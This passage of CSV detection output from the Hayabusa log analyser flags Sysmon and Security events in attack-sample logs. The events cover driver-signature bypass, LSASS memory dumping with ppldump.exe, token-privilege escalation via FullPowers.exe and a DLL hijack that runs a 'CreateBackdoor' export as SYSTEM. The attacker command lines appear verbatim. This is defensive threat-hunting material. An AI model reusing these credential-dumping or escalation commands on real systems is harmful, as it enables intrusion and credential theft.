SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-02-10 08:28:12.856 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: 
C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:12.856 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:12.876 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:12.981 +00:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:12.981 +00:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:13.098 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 08:28:13.147 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx +2020-02-10 10:08:24.535 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:24.535 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious 
Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:24.666 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:24.666 +00:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:24.666 +00:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:25.164 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:25.193 
+00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:25.193 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-10 10:08:27.797 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx +2020-02-11 11:05:37.148 +00:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: 
SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx +2020-02-11 11:05:37.148 +00:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx +2020-03-07 13:17:38.534 +00:00,MSEDGEWIN10,4698,info,,Task Created,"Name: \FullPowersTask | Content: \FullPowersTask S-1-5-19 LeastPrivilege SeAssignPrimaryTokenPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeImpersonatePrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege IgnoreNew true true true false false PT10M PT1H true false true true false false false false false PT72H 7 C:\Users\Public\Tools\TokenManip\FullPowers.exe -t 4932 | User: LOCAL SERVICE | LID: 0x3e5",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-07 13:17:39.984 +00:00,MSEDGEWIN10,4699,info,,Task Deleted,Name: \FullPowersTask | User: LOCAL SERVICE | LID: 0x3e5,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-07 13:17:39.984 +00:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx +2020-03-08 22:11:34.340 +00:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-08 22:11:34.340 +00:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-08 22:11:34.340 +00:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx +2020-03-21 05:00:16.296 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:16.507 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: 
SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.016 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.980 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.980 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.982 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.992 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.996 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.997 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:17.998 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.003 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.005 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.007 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.011 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.011 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.014 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.018 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.024 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.042 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.046 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:18.050 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
